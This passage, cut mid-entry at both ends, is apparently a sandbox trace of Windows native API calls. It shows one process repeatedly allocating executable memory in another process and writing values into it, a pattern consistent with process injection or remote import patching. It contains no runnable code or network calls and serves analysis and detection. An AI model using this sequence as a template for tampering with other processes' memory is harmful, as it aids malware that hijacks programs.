FreeType=0x8000) returned 0x0 [0241.260] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.261] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.261] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.261] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.261] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.261] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5f4*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5f4*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.261] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.261] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.262] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.262] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.262] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.262] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.262] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.262] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.263] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.263] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.263] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.263] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.263] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.263] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.263] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c602*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c602*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0241.263] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.264] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.264] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.264] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.264] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.265] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.265] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.265] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.265] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.265] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.265] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.265] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.266] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a100, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.266] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.266] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c60e*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c60e*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.266] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.266] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.266] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.267] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.267] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.267] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.267] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.267] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.267] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.267] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.268] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.268] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.268] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a108, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.268] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.268] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c61c*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c61c*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0241.268] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.268] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.269] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.269] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.269] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.269] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.269] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.269] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.269] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.270] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.270] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.270] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.270] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a110, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.270] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.270] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c632*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c632*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.270] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.271] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.271] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.271] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.271] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.271] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.271] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.272] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.272] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.272] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.272] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.272] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.272] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a118, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.272] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.272] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c644*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c644*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.273] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.273] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.273] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.273] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.273] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.274] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.274] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.274] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.274] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.274] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.274] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.274] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.274] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a120, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.275] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.275] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c652*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c652*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.275] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.275] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.275] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.275] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.276] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.276] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.276] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.276] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.276] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.276] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.277] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.277] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.277] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a128, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.277] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.277] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c662*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c662*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.277] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.277] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.278] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.278] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.278] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.278] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.278] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.278] NtReadVirtualMemory (in: 